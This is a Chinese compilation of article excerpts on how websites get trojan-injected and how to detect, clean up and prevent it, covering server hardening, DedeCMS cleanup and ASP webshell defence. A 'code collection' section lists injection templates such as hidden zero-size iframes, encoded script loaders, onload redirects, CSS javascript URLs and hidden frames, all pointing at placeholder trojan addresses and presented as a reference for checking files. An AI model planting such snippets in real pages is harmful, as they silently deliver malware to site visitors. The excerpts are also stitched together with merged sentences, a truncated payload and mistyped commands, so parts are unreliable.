如何防范解决网站被挂马
网站挂马的整改措施
网站挂马的整改措施篇一:网站被挂马的表现及解决办法人怕出名猪怕壮网站有点名气就会成为挂马的目标。
此教程为初级教程高手飘过。
网站被挂马有何危害性?答:网页被挂马,在一定程度上可以说是网页被篡改,但是比较隐蔽。
危害很大。
对服务器端来说,一方面是系统资源,流量带宽资源的巨大损失,另一方面也成为了传播网页木马的“傀儡帮凶”,严重影响到网站的公众信誉度;对客户端来说,很多网页木马都是利益驱动,偷盗各类帐号密码,如电子银行帐户和密码、游戏帐号和密码、邮箱帐户和密码、qq/mSn 帐号和密码等;另外,使得客户端被安装恶意插件,强迫浏览黑客指定的网站;或者被利用攻击某个站点等。
目前流行的“游戏信使”(盗用各类网游帐号密码)也都是依靠网页挂马攻击来实现的。
在主动越来越困难的情况下,利用网页木马进行攻击已经成为目前最为流行的黑客攻击手段,所以应引起足够重视!网站被挂马的种类?目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的什么样子的网站比较容易被挂马?应该说各大中型网站均有被挂马的可能,事实也证明国内多个大型站点都曾被挂马,由于系统漏洞、网站实现代码缺陷(如SQL注入、论坛代码缺陷、跨站脚本等)、或网站提供web服务的程序漏洞、iiS漏洞、apache漏洞等都有被挂马的可能;访问量越大的网站越有被挂马的可能,因为此类网站被黑客关注程度较高;另外就是各类zhengFU 网站、各大中型企业网站,由于专业性技术人员缺乏,网站大多由第三方公司外包开发,存在缺陷较多,也最容易被挂马。
服务器被挂马,如何才能发现?答:(1):专业检测工具如木马清道夫(2):google检测,网站制作完成后上传到服务器上,可以利用Google 搜索你的网站、博客进行检测。
如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。
(3):杀毒软件检测,常用的杀毒软件也可以检测出来。
(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。
网页挂马调查报告
网页挂马调查报告网页被挂马是最让站长头痛的一件事情,因为这说明已经有骇客拥有了你的网站的操作权限,面对这种情况,首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具,彻底清除恶意代码和后门;而如果你拥有自己的主机,则应当积极检查程序是否有漏洞并立即升级到最新的补丁。
所以作为站长就应当最早的发现网页被挂马的代码,下面是一些比较常见的挂马方式:常见挂马方式这种挂马方式比较多,主要是以下这种格式:“<iframe src=木马地址 width=0 height=0></iframe>”,width=0和height=0是为了隐藏框架。
与Iframe挂马平级,也比较常见,主要是以下这种格式:"<script src=木马地址></script>",当然也可以演变为Iframe挂马,"<script>document.write('<iframe src=木马地址 width=0 height=0></iframe>')</script>"。
附上一张石头博客被Script挂马的截图只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。
这种挂马方式与Script挂马差不多,惟一不同的就是使用了Encode隐藏了源JS的后缀,但同样可以达到执行代码的目的,主要是以下这种格式:“<script language='JScript.Encode' src=/a.txt></script>”虽然表面上看只是引用了一个txt文件,但是依然可以顺利执行其中的代码。
避免网站被挂马的措施有哪些:
避免网站被挂马的措施有哪些?
避免网站被挂马的措施有哪些?
一、查看源文件与首页相关的CSS和JS文件
网站有没有被挂马,最直接的方法就是对网站源代码进行查看。
但是需要对CSS文件和JS文件进行仔细辨认。
很多时候,网站首页显示没有任何异常,但是如果对CSS文件和JS文件进行辨认,会发现很多木马隐藏在里面。
二、定期修改ftp的.用户与密码
FTP密码破解起来并不是很难,因为很多站长都是比较存心,对ftp密码进行纯数字式的设置,这样就给黑客很多机会。
即使设置再多的数字密码,一般使用纯数字密码穷举器两个小时就可以破解出来。
因此如果想降低网站被挂马的危险,首先需要对ftp密码和用户名进行经常更新。
三、注意首页及重要页面生成时间
很多网站自上线以后,就大规模进行更新,后期对网站更新就比较慢。
这样对网站优化和网站自身都是非常不利的。
一般这样的网站被挂马的情况会比较多,如果出现网站被挂马,首先需要注意首页和重要页面生成时间,近期的就需要对网站页面进行全面覆盖,这样网站后期对挂马的影响就比较小。
网页挂马及其防御
网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上,“网页挂马”是一个出现频率很高的词汇。
关于某些网站被挂马导致大量浏览用户受到攻击,甚至造成财产损失的新闻屡见不鲜。
而这些挂马事件总能和一些软件漏洞联系起来。
那么,什么是网页挂马?网页挂马和软件漏洞有什么联系?它的危害在什么地方,又该如何防御呢?本文结合攻防研究中的经验体会,将就这些问题进行探讨。
网页挂马简介什么是网页挂马要解释什么是网页挂马,要先从木马说起。
大家知道,木马是一类恶意程序,和其它的正常文件一样存在于计算机系统中。
这些恶意程序一旦运行,会连接到远处的控制端,使其享有恶意程序所在系统的大部分操作权限,例如给计算机增删密码,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等各种有害操作,而这些操作往往不被使用者察觉。
将木马与网页结合起来成为网页木马,表面看似正常的网页,当浏览者浏览该网页的同时也运行了木马程序。
网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞,自动下载已经放置在远端的恶意程序。
由于下载过程利用了软件上的漏洞,是非正常途径,不会被计算机系统或浏览器本身所察觉。
网页挂马指的是攻击者篡改了正常的网页,向网页中插入一段代码,当用户浏览网页的同时执行这段代码,将引导用户去浏览放置好的网页木马。
使用一些特别的技术可以使得这段代码的执行对用户来说不可见。
网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞,只要这些漏洞能够被利用并执行任意代码,那么存在漏洞的系统就有可能受到网页木马攻击。
网页挂马的技术门槛并不高,互联网上可以得到很多现成的攻击工具。
同时网页木马隐蔽性高,挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行,用户都无法察觉。
网页挂马的传播范围同被挂马网页的数量和浏览量成正比。
各种类型的网站都可以成为网页挂马的对象。
上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。
网站漏洞危害及整改建议
网站漏洞危害及整改建议1。
网站木马1。
1 危害利用IE浏览器漏洞,让IE在后台自动下载黑客放置在网站上的木马并运行(安装)这个木马,即这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始,从而实现控制访问者电脑或安装恶意软件的目的。
1。
2 利用方式表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
可被木马植入的网页也意味着能被篡改页面内容。
1。
3 整改建议1)加强网站程序安全检测,及时修补网站漏洞;2)对网站代码进行一次全面检测,查看是否有其余恶意程序存在;3)建议重新安装服务器及程序源码,防止有深度隐藏的恶意程序无法检测到,导致重新安装系统后攻击者仍可利用后门进入;4)如有条件,建议部署网站防篡改设备。
2 . 网站暗链2。
1 危害网站被恶意攻击者插入大量暗链,将会被搜索引擎惩罚,降低权重值;被插入大量恶意链接将会对网站访问者造成不良影响;将会协助恶意网站(可能为钓鱼网站、反动网站、赌博网站等)提高搜索引擎网站排名。
可被插入暗链的网页也意味着能被篡改页面内容.2.2 利用方式“暗链”就是看不见的网站链接,“暗链”在网站中的链接做的非常隐蔽,可能访问者并不能一眼就能识别出被挂的隐藏链接。
它和友情链接有相似之处,可以有效地提高PR 值,所以往往被恶意攻击者利用。
2.3 整改建议1)加强网站程序安全检测,及时修补网站漏洞;2)对网站代码进行一次全面检测,查看是否有其余恶意程序存在;3)建议重新安装服务器及程序源码,防止无法到检测深度隐藏的恶意程序,导致重新安装系统后攻击者仍可利用后门进入;4)如有条件,建议部署网站防篡改设备。
3 。
页面篡改3.1 危害政府门户网站一旦被篡改将造成多种严重的后果,主要表现在以下一些方面:1)政府形象受损;2)影响信息发布和传播;3)恶意发布有害违法信息及言论;4)木马病毒传播,引发系统崩溃、数据损坏等;5)造成泄密事件.3.2 利用方式恶意攻击者得到网站权限篡改网站页面内容,一般多为网站首页,或者得到域名控制权限后通过修改域名A记录,域名劫持也可达到页面篡改的目的。
如何解决dede黑客挂马问题
在上一篇文章dede最新漏洞以及黑客木马特征中,讲述了2013年6月份爆发的dede 5.7 sp1黑客挂马的木马特征。
从中我们可以看到,dedecms后台管理系统升级之后依旧存在很多不为人知的漏洞,并且360网站安全检测也非常配合的将网站的漏洞暴露在黑客面前。
为此黑客们无需花多少时间找寻可注入的路径,直接就可以通过漏洞提权拿站注入木马。
具体360网站安全检测地址疯子就不透露了,以免被有心人利用,用来为祸网络。
网站被入侵的途径,这次所遇到就是DNS入侵。
DNS入侵往往防不胜防,对此疯子也中招。
网络端口全开,黑客一下子进入侵进来。
如果你发现还好,否则不通过百度搜索引擎是查不出网站被入侵的。
这年头,只有中招之后才知道网络安全的可贵,才开始重视网站防护。
网站被劫持之后,如何删除木马,如何解决被黑客挂马的问题?首先一点修改主页模板,删除</head>后面的{dede:dsv/}或者{dede:dinfo/}这个调用标签。
然后找到根目录/include/taglib/dsv.lib.php或者/include/taglib/dinfo.lib.php进行删除,然后就可以发现网站已经恢复了。
不要以为现在就万事大吉,让人恐怖的还在后头。
通过dedecms后台管理:系统-》系统用户管理,你会发现,在系统管理用户中发现一个新的超级管理员。
删除之后,系统还会提示不能删除超级管理员,必须要到数据库数据表中才能删除。
那么如何删除超级管理员呢?通过《dedecms如何删除admin 超级管理员或者对管理员进行降权操作?》一文所介绍的问题,我们可以通过SQL数据库语言,将admin改成被篡改的超级用户的名称,这样就可以实现绝对防护。
具体路径:系统-》SQL命令行工具-》执行SQL语言。
第三步,查看自定义宏标记。
路径:模板-》自定义宏标记。
中了木马病毒的网站在这里会出现两个被黑客定义的宏标记,主要是对网站全局变量的控制。
浅谈如何来加固服务器防网络被挂马
浅谈如何来加固服务器防网络被挂马摘要:由于黑客技术盛行,许多网络经常被挂马,虽然管理人员都采取了相应的措施,但被挂马事件并不能避免。
通过调查发现,服务器在整个网络中占很重要的地位。
也就是说网络是否被挂马的关键在于服务器。
因此,本文通过加固服务器防网络被挂马进行了分析与调研。
关键词:服务器网站安全加固二级网网络管理员源代码安全性1、服务器加固方法服务器在整个网络中的起关键作用。
因此,管理员在服务器的设置要十分的谨慎,尤其是设置服务器管理员密码的使用口令,对默认的登录账户要及时修改。
因为许多无聊的攻击者会采用扫描终端的弱口令进行入侵。
改名系统默认账户名,并新建一个Administrato帐户作为陷阱账户,设置超长密码,并让这个账号不属于任何用户组,改名并禁用掉Guest用户。
某些组件长期被黑客利用,因此不使用应及时的关闭或卸载该组件FSO:运行rcgsvr32scrrun,dll即可。
如果想关闭FSO组件,请运行regsvr32/u scrrun,dll即可。
加固服务器的总的做法:(1)如果不是远程对服务器进行安全配置,那么请在安装系统前就应该把网线拔掉;(2)尽量安装和运行越少的应用程序和服务,安装时且不要使用默认的路径安装;(3)安装完程序并对服务器设置完后,请将当前服务器的进程抓图或记录下来,将其保存,方便以后对照查看是否有不明的程序;(4)将当前开放的端口抓图或记录下来,保存方便以后对照查看是否开放了不明的端口。
当然如果你能分辨每一个进程和端口这一步可以省略;(5)及时升级和更新最近的补丁文件;(6)可以适量采用第三方软件或硬件对服务器进行加固;(7)登录远程使用完后一定记得注销;2、网站被挂马原因解析及网络安全加固2,1网络被挂马的原因(1)应用程序和网络服务器的系统自身的安全漏洞导致了网络被挂马,任何一个系统或者软件程序都存在这样或那样的安全漏洞,这需要每个公司根据自身的产品定时的发布补丁程序或者安全公告,一旦管理人员管理不当或是管理不到位,黑客就可能抓住这个漏洞对网站进行攻击,破坏网络,篡改网页进行挂马。
教你如何防范挂马和解决挂马问题
教你如何防范挂马和解决挂马问题我没事在网上瞎逛,发现好多网站进去都有被挂马的现象,现在网站挂马现象越来越严重了,刚好我朋友也联系我说该怎么处理这样的问题,我想很多站长们也面临这同样的问题吧。
如何防范挂马和解决挂马问题,下面我来谈谈八个方案!希望对大家有所帮助。
有独立服务器的站长朋友,要在服务器里装杀毒软件,譬如nod32或Symantec AntiVirus,及时更新软件病毒库,开通文件主动检测,这两个是我自己觉得还可以的服务器杀毒软件,推荐使用。
当然,要是有空的话,另外再装个ARP防火墙是最好不过了,我自己长期租服务器我清楚,有时候会局域网ARP攻击,这样会导致全部服务器被挂马。
不要在服务器里浏览网站,譬如你需要下载一个核心源程序来做网站,建议你开设FTP,用FTP来上传和修改网站文件,服务器里尽量少安装一些asp的上传组件,当然,要是有需要装的话,也需要看看该怎么做好该组件的安全策略,这里不细说了。
一般的网站都有附件目录,是通过前台或后台上传完文件,文件所在的目录,有服务器的朋友建议对附件目录设置不支持asp或php 运行,这样可以大大避免了网站被挂马。
到比较正规的源码网站下载程序,对于下载的asp+access类型网站来说,需要注意的是后台路径、后台帐号密码、数据库路径、网站的后台路径,这些都需要更改,譬如“/admin”后台路径,这是绝对需要更改的。
后台管理员帐号密码需要复杂化,譬如可以设置为“sdkkPPaQ,。
;;%$*”。
数据库文件名称,建议把“.mdb”修改为“.asp”,才不会被黑客下载过去,这点不可忽视。
对于asp+mssql类型网站来说,mssql数据库的帐号密码也需要复杂化。
如果你下载的核心程序是比较大的团队在一直更新的,那么你就要经常关注他们官方动态,有发布升级程序,你就要马上去按照他上面写的步骤升级,避免程序漏洞的发生。
我发现很多网站喜欢在自己网站顶部或底部版权处,为了怕忘记后台路径,就放上自己的后台登陆链接,这是不可取的,这不是为黑客提供了第一道入侵通道吗?建议去掉吧,防范于未然。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
如何防范解决网站被挂马?1.一般所谓的黑客入侵网站,都会用一些黑客软件,最常用的就是用SQL注入软件,检测网站有没有SQL注入,以及上传的漏洞。
这些软件在网上多的是,而且有很多视频教程,只要有人去研究的话,都可以称自己是黑客。
2.挂马的常用方法有:挂马代码大全ps:检查文件是否被挂马的时候可以参考下!一:框架挂马<iframe src=地址width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width=0 height=0 src=地址></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCRIPT language="JScript.Encode" src=></script>muma.txt可改成任意后缀四:body挂马<body onload="window.location=地址;"></body>五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + \r\n<iframe src="/ 六:css中挂马body {background-image: url(javascript:document.write("<script src=></script>"))}七:JAJA挂马<SCRIPT language=javascript>window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,s cro llbars=no,width=1,height=1");</script>八:图片伪装<html><iframe src="网马地址" height=0 width=0></iframe><img src="图片地址"></center></html>九:伪装调用:<frameset rows="444,0" cols="*"><frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"mar gingheight="0"><frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"marg ingheight="0"></frameset>十:高级欺骗<a href="迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容</a><SCRIPT Language="JavaScript">function www_163_com (){var url="网马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=6 00,left=10,top=10");}</SCRIPT>("></iframe>;3.解决挂马的方法有:A。
为什么好好的网站会有木马?一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有上传功能,没有进行文件目录和文件后缀等的判断,一般这类的目录,以“海阳顶端网ASP木马”较为流行。
解决办法:所有使用星外虚拟主机管理平台的虚拟主机用户,可以在主机面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限,就可以解决这个问题。
大家常用的动易2006和动网,BLOG这类的程序,需要详细的检查一下,并跟着开发者进行相应的安全程序升级。
这样才能减少因代码原因引起的网站被黑。
B。
网站被黑了,如何检查是那些网页有问题呢。
目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入<iframe src=http://这样的,需要使用查找程序来查找这类文件出来,手工删除此类插入的HTML代码。
这项工作相对比较繁锁。
需要仔细的查找。
也会有一些木马是插入到js中,是以js调用方式的。
更详细的资料,请看后部分E.挂马代码大全。
由于ASP它本身是服务器提供的一贡服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁。
因此针对AS P木马的防范和清除,为网管人员提出了更高的技术要求.几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施。
鉴于大部分网站入侵都是利用asp木马完成的,特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。
也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马!我们首先来说一下怎么样防范好了,说到防范我们自然要对asp木马的原理了,大道理我也不讲了,网上的文章有的是,简单的说asp木马其实就是用asp编写的网站程序,甚至有些asp木马就是由asp网站管理程序修改而来的。
就比如说我们常见的asp站长助手,等等它和其他asp程序没有本质区别,只要是能运行asp的空间就能运行它,这种性质使得asp木马非常不易被发觉。
它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间,并帮助入侵者控制目标空间的asp程序。
严重的从而获取服务器管理员的权限,要想禁止asp木马运行就等于禁止asp的运行,显然这是行不通的,这也是为什么asp木马猖獗的原因!有人要问了,是不是就没有办法了呢,不,有办法的:第一:从源头入手,入侵者是怎么样上传asp木马的呢?一般哟几种方法,通过sql注射手段,获取管理员权限,通过备份数据库的功能将asp木马写入服务器。
或者进入后台通过asp程序的上传功能的漏洞,上传木马等等,当然正常情况下,这些可以上传文件的asp程序都是有权限限制的,大多也限制了asp文件的上传。
(比如:可以上传图片的新闻发布、图片管理程序,及可以上传更多类型文件的论坛程序等),如果我们直接上传asp 木马的话,我们会发现,程序会有提示,是不能直接上传的,但由于存在人为的asp设置错误及asp程序本身的漏洞,给了入侵者可乘之机,实现上传asp木马。
因此,防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上,如果你是用别人的程序的话,尽量用出名一点的大型一点的程序,这样漏洞自然就少一些,而且尽量使用最新的版本,并且要经常去官方网站查看新版本或者是最新补丁,还有就是那些数据库默认路径呀,管理员密码默认呀,一定要改,形成习惯保证程序的安全性。
那么如果你是程序员的话,我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
防止ASP主页. inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意上面的只是对客户的一些要求,但是空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序,以及每个程序是否存在漏洞,因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。
空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。
这也更加说明要防范asp木马,虚拟主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考:1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。
5、要尽量保持程序是最新版本。
6、不要在网页上加注后台管理程序登陆页面的链接。
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
8、要时常备份数据库等重要文件。
9、日常要多维护,并注意空间中是否有来历不明的asp文件。
记住:一分汗水,换一分安全!10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。
重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
做好以上防范措施,您的网站只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争这里利用了我原来cherish个人空间收集的资料,出处不明。
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。